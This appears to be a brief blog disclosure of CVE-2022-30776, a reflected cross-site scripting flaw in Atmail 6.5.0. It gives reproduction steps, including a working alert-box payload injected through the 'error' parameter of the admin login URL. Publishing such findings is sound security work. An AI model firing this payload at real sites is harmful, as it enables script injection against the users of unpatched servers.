CVE-2022–30776

Reflected XSS on sites using Atmail hosting

Discovered by : Ronit Bhatt

Vulnerable Version: Atmail 6.5.0

Vendor Homepage: https://help.atmail.com/hc/en-us/sections/115003283988

Bug Description:

Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “error” parameter.

Steps To Reproduce:

1. Visit the login page of the site using atmail hosting.

2. Now append the “error” parameter with xss payload as shown in the below screenshot and hit enter i.e /atmail/index.php/admin/index/?error=1<ScRiPt >alert(%27XSS%27)</ScRiPt>

3. BOOM! Your Reflected XSS will be triggered :D

Hope you like the blog and find some XSS along with some $$$$ 😎.

LinkedIn: https://www.linkedin.com/in/ronit-bhatt-653a7115b/

Thank you

Ronit Bhatt